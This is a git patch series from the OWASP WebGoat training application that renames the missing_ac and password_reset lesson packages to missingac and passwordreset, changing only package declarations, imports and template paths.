 rename src/main/resources/lessons/{missing_ac => missingac}/db/migration/V2021_11_03_1__ac.sql (100%)
 rename src/main/resources/lessons/{missing_ac => missingac}/documentation/missing-function-ac-01-intro.adoc (100%)
 rename src/main/resources/lessons/{missing_ac => missingac}/documentation/missing-function-ac-02-client-controls.adoc (100%)
 rename src/main/resources/lessons/{missing_ac => missingac}/documentation/missing-function-ac-03-users.adoc (100%)
 rename src/main/resources/lessons/{missing_ac => missingac}/documentation/missing-function-ac-04-users-fixed.adoc (100%)
 rename src/main/resources/lessons/{missing_ac => missingac}/html/MissingFunctionAC.html (89%)
 rename src/main/resources/lessons/{missing_ac => missingac}/i18n/WebGoatLabels.properties (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/DisplayUserTest.java (87%)
 rename src/test/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingFunctionACHiddenMenusTest.java (96%)
 rename src/test/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingFunctionACUsersTest.java (96%)
 rename src/test/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingFunctionACYourHashAdminTest.java (85%)
 rename src/test/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingFunctionYourHashTest.java (95%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/missing_ac/DisplayUser.java b/src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/missing_ac/DisplayUser.java
rename to src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java
index 2bb2fe0c9..f474dce5d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missing_ac/DisplayUser.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import lombok.Getter;
 
diff --git a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingAccessControlUserRepository.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingAccessControlUserRepository.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingAccessControlUserRepository.java
rename to src/main/java/org/owasp/webgoat/lessons/missingac/MissingAccessControlUserRepository.java
index f42eeddc0..7c0615e6e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingAccessControlUserRepository.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingAccessControlUserRepository.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.springframework.jdbc.core.RowMapper;
diff --git a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionAC.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java
rename to src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionAC.java
index 609745ee2..80dd3a676 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionAC.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenus.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenus.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenus.java
rename to src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenus.java
index e07dbc961..1768e532c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenus.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenus.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsers.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsers.java
similarity index 94%
rename from src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsers.java
rename to src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsers.java
index c8052cada..1e248c64e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsers.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsers.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
@@ -34,13 +34,13 @@ import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.servlet.ModelAndView;
 
+import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
+import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
+
 import java.util.ArrayList;
 import java.util.List;
 import java.util.stream.Collectors;
 
-import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
-import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
-
 /**
  * Created by jason on 1/5/17.
  */
diff --git a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHash.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHash.java
similarity index 94%
rename from src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHash.java
rename to src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHash.java
index 1c5a7a279..043fe905a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHash.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHash.java
@@ -20,9 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import lombok.RequiredArgsConstructor;
+
+import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
+
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -30,8 +33,6 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
-
 @RestController
 @AssignmentHints({"access-control.hash.hint1", "access-control.hash.hint2", "access-control.hash.hint3", "access-control.hash.hint4", "access-control.hash.hint5"})
 @RequiredArgsConstructor
diff --git a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdmin.java b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdmin.java
similarity index 95%
rename from src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdmin.java
rename to src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdmin.java
index 8184a2f3e..80c8d185b 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdmin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdmin.java
@@ -20,7 +20,9 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
+
+import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -29,8 +31,6 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
-
 @RestController
 @AssignmentHints({"access-control.hash.hint6", "access-control.hash.hint7",
         "access-control.hash.hint8", "access-control.hash.hint9", "access-control.hash.hint10", "access-control.hash.hint11", "access-control.hash.hint12"})
diff --git a/src/main/java/org/owasp/webgoat/lessons/missing_ac/User.java b/src/main/java/org/owasp/webgoat/lessons/missingac/User.java
similarity index 84%
rename from src/main/java/org/owasp/webgoat/lessons/missing_ac/User.java
rename to src/main/java/org/owasp/webgoat/lessons/missingac/User.java
index a3a9be85b..f5b8161f7 100644
--- a/src/main/java/org/owasp/webgoat/lessons/missing_ac/User.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missingac/User.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import lombok.AllArgsConstructor;
 import lombok.Data;
diff --git a/src/main/resources/lessons/missing_ac/css/ac.css b/src/main/resources/lessons/missingac/css/ac.css
similarity index 100%
rename from src/main/resources/lessons/missing_ac/css/ac.css
rename to src/main/resources/lessons/missingac/css/ac.css
diff --git a/src/main/resources/lessons/missing_ac/db/migration/V2021_11_03_1__ac.sql b/src/main/resources/lessons/missingac/db/migration/V2021_11_03_1__ac.sql
similarity index 100%
rename from src/main/resources/lessons/missing_ac/db/migration/V2021_11_03_1__ac.sql
rename to src/main/resources/lessons/missingac/db/migration/V2021_11_03_1__ac.sql
diff --git a/src/main/resources/lessons/missing_ac/documentation/missing-function-ac-01-intro.adoc b/src/main/resources/lessons/missingac/documentation/missing-function-ac-01-intro.adoc
similarity index 100%
rename from src/main/resources/lessons/missing_ac/documentation/missing-function-ac-01-intro.adoc
rename to src/main/resources/lessons/missingac/documentation/missing-function-ac-01-intro.adoc
diff --git a/src/main/resources/lessons/missing_ac/documentation/missing-function-ac-02-client-controls.adoc b/src/main/resources/lessons/missingac/documentation/missing-function-ac-02-client-controls.adoc
similarity index 100%
rename from src/main/resources/lessons/missing_ac/documentation/missing-function-ac-02-client-controls.adoc
rename to src/main/resources/lessons/missingac/documentation/missing-function-ac-02-client-controls.adoc
diff --git a/src/main/resources/lessons/missing_ac/documentation/missing-function-ac-03-users.adoc b/src/main/resources/lessons/missingac/documentation/missing-function-ac-03-users.adoc
similarity index 100%
rename from src/main/resources/lessons/missing_ac/documentation/missing-function-ac-03-users.adoc
rename to src/main/resources/lessons/missingac/documentation/missing-function-ac-03-users.adoc
diff --git a/src/main/resources/lessons/missing_ac/documentation/missing-function-ac-04-users-fixed.adoc b/src/main/resources/lessons/missingac/documentation/missing-function-ac-04-users-fixed.adoc
similarity index 100%
rename from src/main/resources/lessons/missing_ac/documentation/missing-function-ac-04-users-fixed.adoc
rename to src/main/resources/lessons/missingac/documentation/missing-function-ac-04-users-fixed.adoc
diff --git a/src/main/resources/lessons/missing_ac/html/MissingFunctionAC.html b/src/main/resources/lessons/missingac/html/MissingFunctionAC.html
similarity index 89%
rename from src/main/resources/lessons/missing_ac/html/MissingFunctionAC.html
rename to src/main/resources/lessons/missingac/html/MissingFunctionAC.html
index daf5b8fd6..bb0d1d248 100644
--- a/src/main/resources/lessons/missing_ac/html/MissingFunctionAC.html
+++ b/src/main/resources/lessons/missingac/html/MissingFunctionAC.html
@@ -1,12 +1,12 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/missing_ac/documentation/missing-function-ac-01-intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/missingac/documentation/missing-function-ac-01-intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/ac.css}"/>
-    <div class="adoc-content" th:replace="doc:lessons/missing_ac/documentation/missing-function-ac-02-client-controls.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/missingac/documentation/missing-function-ac-02-client-controls.adoc"></div>
 
     <div class="attack-container">
         <nav class="navbar navbar-default">
@@ -70,7 +70,7 @@
 
 <div class="lesson-page-wrapper">
 
-    <div class="adoc-content" th:replace="doc:lessons/missing_ac/documentation/missing-function-ac-03-users.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/missingac/documentation/missing-function-ac-03-users.adoc"></div>
 
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -92,7 +92,7 @@
 
 <div class="lesson-page-wrapper">
 
-    <div class="adoc-content" th:replace="doc:lessons/missing_ac/documentation/missing-function-ac-04-users-fixed.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/missingac/documentation/missing-function-ac-04-users-fixed.adoc"></div>
 
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
diff --git a/src/main/resources/lessons/missing_ac/i18n/WebGoatLabels.properties b/src/main/resources/lessons/missingac/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/missing_ac/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/missingac/i18n/WebGoatLabels.properties
diff --git a/src/test/java/org/owasp/webgoat/lessons/missing_ac/DisplayUserTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/DisplayUserTest.java
similarity index 87%
rename from src/test/java/org/owasp/webgoat/lessons/missing_ac/DisplayUserTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missingac/DisplayUserTest.java
index 372c2b8df..ecdbb165b 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missing_ac/DisplayUserTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/DisplayUserTest.java
@@ -20,14 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
+
+import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
 
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.lessons.missing_ac.DisplayUser;
-import org.owasp.webgoat.lessons.missing_ac.User;
-
-import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
+import org.owasp.webgoat.lessons.missingac.DisplayUser;
+import org.owasp.webgoat.lessons.missingac.User;
 
 class DisplayUserTest {
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenusTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenusTest.java
similarity index 96%
rename from src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenusTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenusTest.java
index f6e8d2f88..a7aa0dfd7 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenusTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenusTest.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
@@ -28,6 +28,7 @@ import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
 import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.lessons.missingac.MissingFunctionACHiddenMenus;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsersTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsersTest.java
similarity index 96%
rename from src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsersTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsersTest.java
index fff7fe910..2c0d9ac13 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsersTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsersTest.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC;
+import org.owasp.webgoat.lessons.missingac.MissingFunctionAC;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
diff --git a/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdminTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdminTest.java
similarity index 85%
rename from src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdminTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdminTest.java
index 1ba79bbd0..074a0b734 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdminTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACYourHashAdminTest.java
@@ -1,18 +1,18 @@
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.missing_ac.DisplayUser;
-import org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC;
-import org.owasp.webgoat.lessons.missing_ac.User;
+import org.owasp.webgoat.lessons.missingac.DisplayUser;
+import org.owasp.webgoat.lessons.missingac.MissingFunctionAC;
+import org.owasp.webgoat.lessons.missingac.User;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
+import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionYourHashTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionYourHashTest.java
similarity index 95%
rename from src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionYourHashTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionYourHashTest.java
index 9c764b78b..7c01d2c3b 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionYourHashTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionYourHashTest.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.missing_ac;
+package org.owasp.webgoat.lessons.missingac;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC;
+import org.owasp.webgoat.lessons.missingac.MissingFunctionAC;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;

From 37d684fdd3605e33c38d39a0584beb68a52e1431 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 20:16:54 +0200
Subject: [PATCH 188/227] Renamed to passwordreset

---
 .../PasswordReset.java                            |   2 +-
 .../PasswordResetEmail.java                       |   2 +-
 .../QuestionsAssignment.java                      |   2 +-
 .../ResetLinkAssignment.java                      |   6 +++---
 .../ResetLinkAssignmentForgotPassword.java        |   2 +-
 .../SecurityQuestionAssignment.java               |   2 +-
 .../SimpleMailAssignment.java                     |   2 +-
 .../TriedQuestions.java                           |   2 +-
 .../resetlink/PasswordChangeForm.java             |   2 +-
 .../css/password.css                              |   0
 .../PasswordReset_SecurityQuestions.adoc          |   0
 .../documentation/PasswordReset_host_header.adoc  |   0
 .../PasswordReset_known_questions.adoc            |   0
 .../documentation/PasswordReset_mitigation.adoc   |   0
 .../documentation/PasswordReset_plan.adoc         |   0
 .../documentation/PasswordReset_simple.adoc       |   0
 .../PasswordReset_wrong_message.adoc              |   0
 .../html/PasswordReset.html                       |  14 +++++++-------
 .../i18n/WebGoatLabels.properties                 |   0
 .../images/reset1.png                             | Bin
 .../images/reset2.png                             | Bin
 .../images/slack1.png                             | Bin
 .../images/slack2.png                             | Bin
 .../js/password-reset-simple.js                   |   0
 .../templates/password_link_not_found.html        |   0
 .../templates/password_reset.html                 |   0
 .../templates/success.html                        |   0
 .../SecurityQuestionAssignmentTest.java           |   3 ++-
 28 files changed, 20 insertions(+), 19 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/PasswordReset.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/PasswordResetEmail.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/QuestionsAssignment.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/ResetLinkAssignment.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/ResetLinkAssignmentForgotPassword.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/SecurityQuestionAssignment.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/SimpleMailAssignment.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/TriedQuestions.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/resetlink/PasswordChangeForm.java (84%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/css/password.css (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/documentation/PasswordReset_SecurityQuestions.adoc (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/documentation/PasswordReset_host_header.adoc (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/documentation/PasswordReset_known_questions.adoc (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/documentation/PasswordReset_mitigation.adoc (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/documentation/PasswordReset_plan.adoc (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/documentation/PasswordReset_simple.adoc (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/documentation/PasswordReset_wrong_message.adoc (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/html/PasswordReset.html (93%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/images/reset1.png (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/images/reset2.png (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/images/slack1.png (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/images/slack2.png (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/js/password-reset-simple.js (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/templates/password_link_not_found.html (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/templates/password_reset.html (100%)
 rename src/main/resources/lessons/{password_reset => passwordreset}/templates/success.html (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{password_reset => passwordreset}/SecurityQuestionAssignmentTest.java (97%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordReset.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java
rename to src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordReset.java
index a0024f033..eea060533 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordReset.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.password_reset;
+package org.owasp.webgoat.lessons.passwordreset;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordResetEmail.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordResetEmail.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordResetEmail.java
rename to src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordResetEmail.java
index 848e70683..7f21050dc 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordResetEmail.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/PasswordResetEmail.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.password_reset;
+package org.owasp.webgoat.lessons.passwordreset;
 
 import lombok.Builder;
 import lombok.Data;
diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/QuestionsAssignment.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/QuestionsAssignment.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/password_reset/QuestionsAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/passwordreset/QuestionsAssignment.java
index 1b698067e..88ac80fff 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/QuestionsAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/QuestionsAssignment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.password_reset;
+package org.owasp.webgoat.lessons.passwordreset;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignment.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignment.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignment.java
index 24078d78d..d8bfce33d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignment.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.password_reset;
+package org.owasp.webgoat.lessons.passwordreset;
 
 import com.google.common.collect.Maps;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
-import org.owasp.webgoat.lessons.password_reset.resetlink.PasswordChangeForm;
+import org.owasp.webgoat.lessons.passwordreset.resetlink.PasswordChangeForm;
 import org.springframework.ui.Model;
 import org.springframework.validation.BindingResult;
 import org.springframework.web.bind.annotation.GetMapping;
@@ -120,7 +120,7 @@ public class ResetLinkAssignment extends AssignmentEndpoint {
         if (checkIfLinkIsFromTom(form.getResetLink())) {
             usersToTomPassword.put(getWebSession().getUserName(), form.getPassword());
         }
-        modelAndView.setViewName("lessons/password_reset/templates/success.html");
+        modelAndView.setViewName("lessons/passwordreset/templates/success.html");
         return modelAndView;
     }
 
